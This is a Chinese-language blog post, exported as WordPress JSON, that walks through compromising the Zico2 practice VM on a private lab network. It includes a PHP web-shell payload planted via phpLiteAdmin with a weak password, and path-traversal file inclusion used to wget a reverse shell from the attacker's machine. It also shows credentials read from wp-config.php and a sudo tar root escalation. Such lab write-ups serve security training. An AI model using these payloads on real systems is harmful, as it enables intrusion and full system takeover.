{"id":343,"date":"2024-05-04T16:46:55","date_gmt":"2024-05-04T08:46:55","guid":{"rendered":"http:\/\/xiyu12.top\/?p=343"},"modified":"2024-05-04T16:46:55","modified_gmt":"2024-05-04T08:46:55","slug":"zic02","status":"publish","type":"post","link":"http:\/\/www.xiyu12.top\/?p=343","title":{"rendered":"zic02"},"content":{"rendered":"\n

\u4e00\u3001\u4fe1\u606f\u6536\u96c6<\/h2>\n\n\n\n
sudo nmap -sT --min-rate 10000 -p- 192.168.1.145\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-04 14:35 CST\nNmap scan report for 192.168.1.145\nHost is up (0.0014s latency).\nNot shown: 65531 closed tcp ports (conn-refused)\nPORT      STATE SERVICE\n22\/tcp    open  ssh\n80\/tcp    open  http\n111\/tcp   open  rpcbind\n47550\/tcp open  unknown\nMAC Address: 00:0C:29:89:01:E9 (VMware)\n\nNmap done: 1 IP address (1 host up) scanned in 3.30 seconds<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
sudo nmap -sC -sV -p 22,80,111,47550 192.168.1.145\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-05-04 14:36 CST\nNmap scan report for 192.168.1.145\nHost is up (0.00027s latency).\n\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)\n|   2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)\n|_  256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)\n80\/tcp    open  http    Apache httpd 2.2.22 ((Ubuntu))\n|_http-server-header: Apache\/2.2.22 (Ubuntu)\n|_http-title: Zico's Shop\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          36585\/udp   status\n|   100024  1          46557\/tcp6  status\n|   100024  1          47550\/tcp   status\n|_  100024  1          54772\/udp6  status\n47550\/tcp open  status  1 (RPC #100024)\nMAC Address: 00:0C:29:89:01:E9 (VMware)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 12.00 seconds<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
showmount -e 192.168.1.145                        \nclnt_create: RPC: Program not registered\n<\/code><\/pre>\n\n\n\n
 whatweb 192.168.1.145                 \nhttp:\/\/192.168.1.145 [200 OK] Apache[2.2.22], Bootstrap, Country[RESERVED][ZZ], Email[feedback@startbootstrap.com,your-email@your-domain.com], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.2.22 (Ubuntu)], IP[192.168.1.145], JQuery, Script, Title[Zico's Shop], X-UA-Compatible[IE=edge]<\/code><\/pre>\n\n\n\n
\u76ee\u5f55\u626b\u63cf<\/p>\n\n\n\n
gobuster dir -u http:\/\/startbootstrap.com  --wordlist=\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/startbootstrap.com\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index                (Status: 200) [Size: 7970]\n\/img                  (Status: 301) [Size: 322] [--> http:\/\/startbootstrap.com\/img\/]\n\/tools                (Status: 200) [Size: 8355]\n\/view                 (Status: 200) [Size: 0]\n\/css                  (Status: 301) [Size: 322] [--> http:\/\/startbootstrap.com\/css\/]\n\/js                   (Status: 301) [Size: 321] [--> http:\/\/startbootstrap.com\/js\/]\n\/vendor               (Status: 301) [Size: 325] [--> http:\/\/startbootstrap.com\/vendor\/]\n\/package              (Status: 200) [Size: 789]\n\/LICENSE              (Status: 200) [Size: 1094]\n\/less                 (Status: 301) [Size: 323] [--> http:\/\/startbootstrap.com\/less\/]\n\/server-status        (Status: 403) [Size: 299]\n\/dbadmin              (Status: 301) [Size: 326] [--> http:\/\/startbootstrap.com\/dbadmin\/]\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n\n\n\n
\u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9<\/h2>\n\n\n\n
\u8bbf\u95ee http:\/\/192.168.1.145  \u770b\u5230\u5e95\u90e8\u6709\u4e00\u4e2a\u7f51\u5740<\/p>\n\n\n\n
echo “192.168.1.145 startbootstrap.com” | sudo tee -a \/etc\/hosts<\/p>\n\n\n\n
\u8bbf\u95ee  http:\/\/startbootstrap.com<\/p>\n\n\n\n
\u770b\u5230\u6709\u51e0\u4e2a\u6309\u94ae\u70b9\u4e00\u70b9  \u53d1\u73b0\u4e00\u4e2a\u5e26\u53c2\u6570 ?page \u7684url   \u6d4b\u8bd5\u4e00\u4e2a  \u53d1\u73b0\u5b58\u5728 \u6587\u4ef6\u5305\u542b<\/p>\n\n\n\n
\u4f7f\u7528 php:\/\/filter\/convert.base64-encode\/resource=  \u67e5\u770b\u4e00\u4e0b\u6e90\u7801 \u53d1\u73b0\u4e0d\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8bbf\u95ee\u4e00\u4e0b\u53e6\u4e00\u4e2aurl   http:\/\/startbootstrap.com\/dbadmin\/<\/a>  \u6709\u4e00\u4e2a\u53ef\u4ee5\u5229\u7528\u7684sql\u5e94\u7528<\/p>\n\n\n\n
\u6709\u4e2a\u5f31\u5bc6\u7801  admin<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u65b0\u5efa\u4e00\u4e2a\u6570\u636e\u5e93  hack.php  \u518d\u5efa\u4e00\u4e2a hack \u8868   \u5728\u9ed8\u8ba4\u503c\u4e2d\u5199\u5165 <?php system($_GET[a]);?>\n\u7136\u540e\u4f7f\u7528  \u6587\u4ef6\u5305\u542b \u8bbf\u95ee  \u8fd9\u4e2ahcak.php\u7684url\n\n<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd9\u65f6\u5019\u53ef\u4ee5\u4e0a\u4f20\u4e00\u4e2aphp\u53cd\u5f39shell\npython3 -m http.server 8000\nnc -lvp 1234\nhttp:\/\/startbootstrap.com\/view.php?page=..\/..\/..\/..\/..\/..\/..\/usr\/databases\/hack.php&a=wget http:\/\/192.168.1.138:8000\/php.php -O \/tmp\/1.php\nhttp:\/\/startbootstrap.com\/view.php?page=..\/..\/..\/..\/..\/..\/..\/usr\/databases\/hack.php&a=<\/a>php \/tmp\/1.php<\/code><\/pre>\n\n\n\n
getshell<\/p>\n\n\n\n
\u4e09\u3001\u63d0\u6743<\/h2>\n\n\n\n
\ncd \/home\/wordpress\ncat wp-config.php\n\u5f97\u5230\u4e00\u4e2a\u51ed\u8bc1\nsu zico2\nsudo -l\n\n<\/code><\/pre>\n\n\n\n
matching Defaults entries for zico on this host:\n    env_reset, exempt_group=admin,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser zico may run the following commands on this host:\n    (root) NOPASSWD: \/bin\/tar\n    (root) NOPASSWD: \/usr\/bin\/zip\n<\/code><\/pre>\n\n\n\n
sudo tar -cf \/dev\/null \/dev\/null –checkpoint=1 –checkpoint-action=exec=\/bin\/sh
root\u6743\u9650<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4e00\u3001\u4fe1\u606f\u6536\u96c6 \u76ee\u5f55\u626b\u63cf \u4e8c\u3001\u83b7\u5f97\u7acb\u8db3\u70b9 \u8bbf\u95ee http:\/\/192.168.1.145 \u770b\u5230\u5e95\u90e8\u6709\u4e00\u4e2a\u7f51\u5740 e […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[63,92,108],"class_list":["post-343","post","type-post","status-publish","format-standard","hentry","category-target-aircraft","tag-phpliteadmin-1-9-3-exploit","tag-sudo-tar","tag-108"],"_links":{"self":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/343","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=343"}],"version-history":[{"count":0,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=\/wp\/v2\/posts\/343\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=343"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=343"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xiyu12.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=343"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}